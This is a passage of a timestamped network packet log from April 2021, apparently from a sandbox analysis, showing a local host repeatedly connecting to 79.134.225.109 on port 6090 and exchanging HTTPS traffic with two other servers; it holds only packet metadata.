Apr 1, 2021 17:41:44.920629025 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920645952 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920665979 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920706987 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.979757071 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.979814053 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.979866028 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.979868889 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.979914904 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.979931116 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.979950905 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.979995012 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980005026 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980048895 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980056047 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980101109 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980106115 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980153084 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980156898 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980202913 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980206966 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980252028 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980269909 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980307102 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980309963 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980365038 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.980367899 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.980422974 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.981849909 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.981899977 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.981966019 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.981966019 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982012033 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982033014 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982070923 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982076883 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982111931 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982134104 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982136011 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982186079 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982194901 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982235909 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982268095 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982316017 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982394934 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982438087 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982474089 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982487917 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982520103 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982537985 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982547045 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982620001 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982628107 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982697010 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982733965 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982753992 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982753992 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982809067 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982814074 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982861996 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982871056 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982912064 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982922077 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.982964039 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.982969046 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.983011007 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.983025074 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.983067036 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:45.087806940 CEST	49706	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:45.193221092 CEST	6090	49706	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:45.816859007 CEST	49706	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:45.918395042 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:45.918452978 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:45.918468952 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:45.918513060 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:45.922877073 CEST	6090	49706	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:46.510075092 CEST	49706	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:46.615835905 CEST	6090	49706	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:46.732036114 CEST	49707	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:46.839406967 CEST	6090	49707	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:47.356357098 CEST	49707	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:47.463609934 CEST	6090	49707	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:47.975186110 CEST	49707	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:48.080708981 CEST	6090	49707	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:48.193557024 CEST	49708	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:48.299197912 CEST	6090	49708	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:48.321861982 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:48.321902990 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:48.321933985 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:48.321976900 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:48.856412888 CEST	49708	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:48.964396000 CEST	6090	49708	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:49.544147015 CEST	49708	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:49.649786949 CEST	6090	49708	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:49.768065929 CEST	49709	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:49.874315977 CEST	6090	49709	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:50.544136047 CEST	49709	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:50.649111986 CEST	6090	49709	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:51.153517008 CEST	49709	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:51.260509968 CEST	6090	49709	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:51.384171009 CEST	49710	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:51.491276026 CEST	6090	49710	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:52.044218063 CEST	49710	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:52.149938107 CEST	6090	49710	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:52.653675079 CEST	49710	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:52.760867119 CEST	6090	49710	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:52.895267010 CEST	49711	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:53.003947973 CEST	6090	49711	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:53.544367075 CEST	49711	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:53.650269032 CEST	6090	49711	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:54.153728008 CEST	49711	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:54.259809017 CEST	6090	49711	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:54.383105993 CEST	49712	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:54.491527081 CEST	6090	49712	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:55.044527054 CEST	49712	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:55.150202036 CEST	6090	49712	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:55.749286890 CEST	49712	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:55.856776953 CEST	6090	49712	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:55.972527981 CEST	49713	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:56.078383923 CEST	6090	49713	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:56.682010889 CEST	49713	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:56.788244009 CEST	6090	49713	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:57.355837107 CEST	49713	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:57.461337090 CEST	6090	49713	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:57.580751896 CEST	49714	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:57.686780930 CEST	6090	49714	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:58.355773926 CEST	49714	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:58.461572886 CEST	6090	49714	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:59.043324947 CEST	49714	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:59.148828030 CEST	6090	49714	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:59.268693924 CEST	49715	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:41:59.374399900 CEST	6090	49715	79.134.225.109	192.168.2.3
Apr 1, 2021 17:41:59.959963083 CEST	49715	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:00.068799973 CEST	6090	49715	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:00.678297997 CEST	49715	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:00.785031080 CEST	6090	49715	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:00.904719114 CEST	49716	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:01.010929108 CEST	6090	49716	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:01.651747942 CEST	49716	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:01.757611036 CEST	6090	49716	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:02.345810890 CEST	49716	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:02.451847076 CEST	6090	49716	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:02.567332983 CEST	49717	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:02.675774097 CEST	6090	49717	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:03.345047951 CEST	49717	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:03.453969002 CEST	6090	49717	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:03.954536915 CEST	49717	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:04.064090967 CEST	6090	49717	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:04.177676916 CEST	49718	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:04.283318996 CEST	6090	49718	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:04.798290968 CEST	49718	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:04.905158997 CEST	6090	49718	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:05.407708883 CEST	49718	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:05.512408018 CEST	6090	49718	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:05.629364967 CEST	49719	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:05.737860918 CEST	6090	49719	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:06.252945900 CEST	49719	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:06.361541986 CEST	6090	49719	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:06.876621962 CEST	49719	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:06.985579014 CEST	6090	49719	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:07.098742008 CEST	49720	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:07.205811024 CEST	6090	49720	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:07.720462084 CEST	49720	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:07.828406096 CEST	6090	49720	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:08.329829931 CEST	49720	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:08.435532093 CEST	6090	49720	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:08.556801081 CEST	49721	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:08.663899899 CEST	6090	49721	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:09.173712015 CEST	49721	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:09.281172037 CEST	6090	49721	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:09.783132076 CEST	49721	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:09.890093088 CEST	6090	49721	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:10.008209944 CEST	49722	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:10.114171028 CEST	6090	49722	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:10.626955986 CEST	49722	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:10.733026981 CEST	6090	49722	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:11.236396074 CEST	49722	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:11.341816902 CEST	6090	49722	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:11.459148884 CEST	49723	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:11.566082001 CEST	6090	49723	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:12.080311060 CEST	49723	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:12.187087059 CEST	6090	49723	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:12.783366919 CEST	49723	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:12.890748978 CEST	6090	49723	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:13.022358894 CEST	49724	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:13.129515886 CEST	6090	49724	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:13.783396006 CEST	49724	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:13.888118982 CEST	6090	49724	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:14.486615896 CEST	49724	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:14.592444897 CEST	6090	49724	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:14.710542917 CEST	49725	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:14.817924023 CEST	6090	49725	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:15.330499887 CEST	49725	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:15.437887907 CEST	6090	49725	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:15.918677092 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:15.939940929 CEST	49725	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:16.046210051 CEST	6090	49725	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:16.162370920 CEST	49726	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:16.276762962 CEST	6090	49726	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:16.783680916 CEST	49726	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:16.891484022 CEST	6090	49726	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:17.408777952 CEST	49726	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:17.518310070 CEST	6090	49726	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:17.677927017 CEST	49727	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:17.784096003 CEST	6090	49727	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:18.283795118 CEST	49727	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:18.389549017 CEST	6090	49727	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:18.893338919 CEST	49727	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:18.999037981 CEST	6090	49727	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:19.114794016 CEST	49728	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:19.225760937 CEST	6090	49728	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:19.737044096 CEST	49728	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:19.845680952 CEST	6090	49728	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:20.362102985 CEST	49728	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:20.470372915 CEST	6090	49728	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:20.588896990 CEST	49729	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:20.699474096 CEST	6090	49729	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:21.206022024 CEST	49729	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:21.317770958 CEST	6090	49729	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:21.831053972 CEST	49729	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:21.939714909 CEST	6090	49729	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:22.053272963 CEST	49730	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:22.161395073 CEST	6090	49730	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:22.674843073 CEST	49730	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:22.780478001 CEST	6090	49730	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:23.284512043 CEST	49730	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:23.390422106 CEST	6090	49730	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:23.506544113 CEST	49731	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:23.612742901 CEST	6090	49731	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:24.128108978 CEST	49731	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:24.234690905 CEST	6090	49731	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:24.737556934 CEST	49731	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:24.845959902 CEST	6090	49731	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:24.960275888 CEST	49732	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:25.069300890 CEST	6090	49732	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:25.581365108 CEST	49732	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:25.691909075 CEST	6090	49732	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:26.206311941 CEST	49732	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:26.314316988 CEST	6090	49732	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:26.428802013 CEST	49733	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:26.539597988 CEST	6090	49733	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:27.050267935 CEST	49733	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:27.160032988 CEST	6090	49733	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:27.675228119 CEST	49733	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:27.783608913 CEST	6090	49733	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:27.897478104 CEST	49734	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:28.007936954 CEST	6090	49734	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:28.519040108 CEST	49734	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:28.627677917 CEST	6090	49734	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:29.128464937 CEST	49734	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:29.238835096 CEST	6090	49734	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:29.659044027 CEST	49735	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:29.768030882 CEST	6090	49735	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:30.269253969 CEST	49735	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:30.378990889 CEST	6090	49735	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:30.894232035 CEST	49735	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:31.001195908 CEST	6090	49735	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:31.115725994 CEST	49736	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:31.223964930 CEST	6090	49736	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:31.738149881 CEST	49736	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:31.846952915 CEST	6090	49736	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:32.363224030 CEST	49736	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:32.472260952 CEST	6090	49736	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:32.605277061 CEST	49737	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:32.711488008 CEST	6090	49737	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:33.222632885 CEST	49737	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:33.327889919 CEST	6090	49737	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:33.831979990 CEST	49737	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:33.938462019 CEST	6090	49737	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:34.053680897 CEST	49738	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:34.162532091 CEST	6090	49738	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:34.675892115 CEST	49738	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:34.784513950 CEST	6090	49738	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:35.300901890 CEST	49738	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:35.412583113 CEST	6090	49738	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:35.537949085 CEST	49739	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:35.648456097 CEST	6090	49739	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:36.160335064 CEST	49739	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:36.268254995 CEST	6090	49739	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:36.769707918 CEST	49739	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:36.878535032 CEST	6090	49739	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:36.991359949 CEST	49740	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:37.100416899 CEST	6090	49740	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:37.613570929 CEST	49740	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:37.722501993 CEST	6090	49740	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:38.238645077 CEST	49740	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:38.347923994 CEST	6090	49740	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:38.461863041 CEST	49741	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:38.567363024 CEST	6090	49741	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:39.082447052 CEST	49741	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:39.188035011 CEST	6090	49741	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:39.691804886 CEST	49741	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:39.798188925 CEST	6090	49741	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:39.916073084 CEST	49742	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:40.022851944 CEST	6090	49742	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:40.431459904 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.492939949 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.493030071 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.535686016 CEST	49742	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:40.549241066 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.608366966 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.609740973 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.609774113 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.609786034 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.609898090 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.609963894 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.624119043 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.644961119 CEST	6090	49742	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:40.685039043 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.685156107 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.715691090 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.776051998 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776096106 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776114941 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776139021 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776161909 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776189089 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776213884 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776237011 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776259899 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776282072 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.776359081 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.776484013 CEST	49743	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:42:40.834652901 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.834680080 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.834693909 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.834708929 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:42:40.834728003 CEST	443	49743	185.81.0.109	192.168.2.3
